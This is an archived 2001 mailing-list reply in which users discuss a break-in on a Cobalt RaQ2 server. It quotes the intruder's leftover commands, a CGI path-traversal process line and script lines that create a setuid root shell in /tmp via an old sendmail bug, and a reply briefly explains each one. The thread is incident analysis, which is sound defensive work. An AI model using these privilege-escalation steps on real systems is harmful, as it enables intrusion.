[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] Raq2 Hack

Subject: Re: [cobalt-users] Raq2 Hack
From: flash22@xxxxxxx
Date: Sun Aug 19 03:57:10 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

On Sun, 19 Aug 2001, Hacked Raq2 wrote:

> Hello all,
> 
> Well, it seems that I've had an intruder on my Raq2. What I'm trying to
> figure out, is how he got in. I have all the important patches applied and

> Here's the processes that were running. It appears he only had the
> privileges of HTTPD:
> 
> httpd    19108  0.0  0.6  3012   864  ?  S NAug 17   0:00 sh -c
> /home/sites/site19/cgi-bin/Mall/../../../../../../../../../../../../../../..
> /../../../../../../../../../

I'd place a bet on that one, looks typical of a exploit to compromise a
cgi with some quoting hole in it....

> I also see that he had some kind of IRC program running.

typical, gotta brag about the exploits to all the other clueless...
> 
> Here are the contents of the shell.pl that he had in /tmp:

Just opens a telnet port...

> Here are a list of the files he put into /tmp:
> 
> echo "[icesk] createing suid shellscript"
> echo <<EOF > /tmp/suid.sh
> #!/bin/sh
> cp /bin/sh /tmp/sh;chmod +s /tmp/sh

Hmm, this isn't supposed to work on raq2's anymore, one of the updates was
supposed to remove the stucky bit from /tmp

> ./sendmail 127.0.0.1 /tmp/suid.sh

Old bug in sendmail...makes it try to 'fix' owner/permissions on the
file...

> echo "[icesk] allow 10 minutes for mail to cycle then run /tmp/sh"

which maybe now has higher perms and g+s

gsh

Follow-Ups:
- Re: [cobalt-users] Raq2 Hack
  - From: Hacked Raq2

References:
- [cobalt-users] Raq2 Hack
  - From: Hacked Raq2

Prev by Date: Re: [cobalt-users] Domain Name Forwarding on a Raq3
Next by Date: Re: [cobalt-users] Raq2 Hack
Previous by thread: RE: [cobalt-users] Raq2 Hack
Next by thread: Re: [cobalt-users] Raq2 Hack

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index